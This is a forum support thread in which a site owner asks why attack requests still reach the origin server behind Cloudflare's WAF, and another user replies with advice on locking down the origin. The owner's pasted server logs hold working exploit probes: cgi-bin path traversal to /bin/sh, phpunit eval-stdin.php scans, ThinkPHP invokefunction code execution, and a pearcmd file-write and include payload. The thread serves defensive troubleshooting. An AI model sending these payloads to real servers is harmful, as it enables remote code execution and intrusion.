Urgent assistance required: My server is receiving attack traffic that should have

What is the name of the domain?

www.meoai.net

What is the error number?

N/A (not applicable, as this is a security configuration issue, not an error)

What is the error message?

No specific error message, but the WAF is not blocking detected attack patterns as expected

What is the issue you’re encountering

I have configured WAF rules to block specific attack vectors, but my server is still logging these requests, indicating that the WAF is not effectively blocking them

What steps have you taken to resolve the issue?

Reviewed and updated WAF rules to cover known attack patterns, cleared CDN cache, and ensured rules are active. However, the issue persists

Was the site working with SSL prior to adding it to Cloudflare?

Yes

What is the current SSL/TLS setting?

Off

Screenshot of the error

That answers this

You are seeing the attack in your server logs, after you enable SSL/TLS are you seeing it in your WAF events? https://dash.cloudflare.com/?to=/:account/:zone/security/events

SSL/TLS setting is on

I didn’t see it in WAF events, I saw the attacks in my server logs.
And my website is https://www.meoai.net/

Here are parts of my server logs

14.161.32.124 - - [09/Jul/2024:17:02:36 +0800] "POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1" 400 150 "-" "-"
118.69.77.143 - - [09/Jul/2024:17:02:41 +0800] "POST /cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/bin/sh HTTP/1.1" 400 150 "-" "-"
118.69.77.143 - - [09/Jul/2024:17:02:46 +0800] "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 146 "-" "Custom-AsyncHttpClient"
118.69.77.143 - - [09/Jul/2024:17:02:47 +0800] "GET /vendor/phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1" 404 146 "-" "Custom-AsyncHttpClient"
118.69.77.143 - - [09/Jul/2024:17:02:50 +0800] "GET /vendor/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 146 "-" "Custom-AsyncHttpClient"
118.69.77.143 - - [09/Jul/2024:17:02:51 +0800] "GET /vendor/phpunit/Util/PHP/eval-stdin.php HTTP/1.1" 404 146 "-" "Custom-AsyncHttpClient"
118.69.77.143 - - [09/Jul/2024:17:02:54 +0800] "GET /vendor/phpunit/phpunit/LICENSE/eval-stdin.php HTTP/1.1" 404 146 "-" "Custom-AsyncHttpClient"
118.69.77.143 - - [09/Jul/2024:17:02:56 +0800] "GET /vendor/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 146 "-" "Custom-AsyncHttpClient"
118.69.77.143 - - [09/Jul/2024:17:02:59 +0800] "GET /phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 146 "-" "Custom-AsyncHttpClient"
118.69.77.143 - - [09/Jul/2024:17:03:02 +0800] "GET /phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1" 404 146 "-" "Custom-AsyncHttpClient"
118.69.77.143 - - [09/Jul/2024:17:03:05 +0800] "GET /phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 146 "-" "Custom-AsyncHttpClient"
118.69.77.143 - - [09/Jul/2024:17:03:07 +0800] "GET /phpunit/Util/PHP/eval-stdin.php HTTP/1.1" 404 146 "-" "Custom-AsyncHttpClient"
118.69.77.143 - - [09/Jul/2024:17:03:10 +0800] "GET /lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 146 "-" "Custom-AsyncHttpClient"
118.69.77.143 - - [09/Jul/2024:17:03:12 +0800] "GET /lib/phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1" 404 146 "-" "Custom-AsyncHttpClient"
118.69.77.143 - - [09/Jul/2024:17:03:15 +0800] "GET /lib/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 146 "-" "Custom-AsyncHttpClient"
118.69.77.143 - - [09/Jul/2024:17:03:18 +0800] "GET /lib/phpunit/Util/PHP/eval-stdin.php HTTP/1.1" 404 146 "-" "Custom-AsyncHttpClient"
118.69.77.143 - - [09/Jul/2024:17:03:20 +0800] "GET /lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 146 "-" "Custom-AsyncHttpClient"
118.69.77.143 - - [09/Jul/2024:17:03:23 +0800] "GET /laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 146 "-" "Custom-AsyncHttpClient"
118.69.77.143 - - [09/Jul/2024:17:03:24 +0800] "GET /www/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 146 "-" "Custom-AsyncHttpClient"
118.69.77.143 - - [09/Jul/2024:17:03:27 +0800] "GET /ws/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 146 "-" "Custom-AsyncHttpClient"
118.69.77.143 - - [09/Jul/2024:17:03:30 +0800] "GET /yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 146 "-" "Custom-AsyncHttpClient"
118.69.77.143 - - [09/Jul/2024:17:03:32 +0800] "GET /zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 146 "-" "Custom-AsyncHttpClient"
118.69.77.143 - - [09/Jul/2024:17:03:36 +0800] "GET /ws/ec/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 146 "-" "Custom-AsyncHttpClient"
118.69.77.143 - - [09/Jul/2024:17:03:37 +0800] "GET /V2/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 146 "-" "Custom-AsyncHttpClient"
118.69.77.143 - - [09/Jul/2024:17:03:40 +0800] "GET /tests/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 146 "-" "Custom-AsyncHttpClient"
118.69.77.143 - - [09/Jul/2024:17:03:43 +0800] "GET /test/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 146 "-" "Custom-AsyncHttpClient"
118.69.77.143 - - [09/Jul/2024:17:03:45 +0800] "GET /testing/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 146 "-" "Custom-AsyncHttpClient"
118.69.77.143 - - [09/Jul/2024:17:03:48 +0800] "GET /api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 146 "-" "Custom-AsyncHttpClient"
118.69.77.143 - - [09/Jul/2024:17:03:50 +0800] "GET /demo/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 146 "-" "Custom-AsyncHttpClient"
118.69.77.143 - - [09/Jul/2024:17:03:53 +0800] "GET /cms/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 146 "-" "Custom-AsyncHttpClient"
118.69.77.143 - - [09/Jul/2024:17:03:54 +0800] "GET /crm/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 146 "-" "Custom-AsyncHttpClient"
118.69.77.143 - - [09/Jul/2024:17:03:56 +0800] "GET /admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 146 "-" "Custom-AsyncHttpClient"
118.69.77.143 - - [09/Jul/2024:17:04:00 +0800] "GET /backup/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 146 "-" "Custom-AsyncHttpClient"
118.69.77.143 - - [09/Jul/2024:17:04:02 +0800] "GET /blog/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 146 "-" "Custom-AsyncHttpClient"
118.69.77.143 - - [09/Jul/2024:17:04:05 +0800] "GET /workspace/drupal/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 146 "-" "Custom-AsyncHttpClient"
118.69.77.143 - - [09/Jul/2024:17:04:08 +0800] "GET /panel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 146 "-" "Custom-AsyncHttpClient"
118.69.77.143 - - [09/Jul/2024:17:04:09 +0800] "GET /public/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 146 "-" "Custom-AsyncHttpClient"
118.69.77.143 - - [09/Jul/2024:17:04:13 +0800] "GET /apps/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 146 "-" "Custom-AsyncHttpClient"
118.69.77.143 - - [09/Jul/2024:17:04:15 +0800] "GET /app/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 146 "-" "Custom-AsyncHttpClient"
118.69.77.143 - - [09/Jul/2024:17:04:19 +0800] "GET /index.php?s=/index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello HTTP/1.1" 200 59658 "-" "Custom-AsyncHttpClient"
118.69.77.143 - - [09/Jul/2024:17:04:25 +0800] "GET /public/index.php?s=/index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello HTTP/1.1" 404 146 "-" "Custom-AsyncHttpClient"
118.69.77.143 - - [09/Jul/2024:17:04:27 +0800] "GET /index.php?lang=../../../../../../../../usr/local/lib/php/pearcmd&+config-create+/&/<?echo(md5(\x22hi\x22));?>+/tmp/index1.php HTTP/1.1" 301 5 "-" "Custom-AsyncHttpClient"
14.161.32.124 - - [09/Jul/2024:17:04:32 +0800] "GET /index.php?lang=../../../../../../../../usr/local/lib/php/pearcmd&+config-create+/&/<?echo(md5(\x22hi\x22));?>+/tmp/index1.php HTTP/1.1" 301 5 "-" "Custom-AsyncHttpClient"
14.161.32.124 - - [09/Jul/2024:17:04:33 +0800] "GET /index.php?lang=../../../../../../../../tmp/index1 HTTP/1.1" 301 5 "-" "Custom-AsyncHttpClient"

if the attackers know the IP source address of my server, will they bypass the CDN, so I will see these logs on my server

You can secure your origin to prevent direct access. I like the firewall method when possible. Authenticated Origin Pulls with your own certificate are also very effective.

1 Like

before I encountered the attacks, I had set up proxied (orange-clouded) DNS records. And I don’t have mail infrastructure, existing DNS-only records (SPF , TXT , and more) do not contain origin IP information.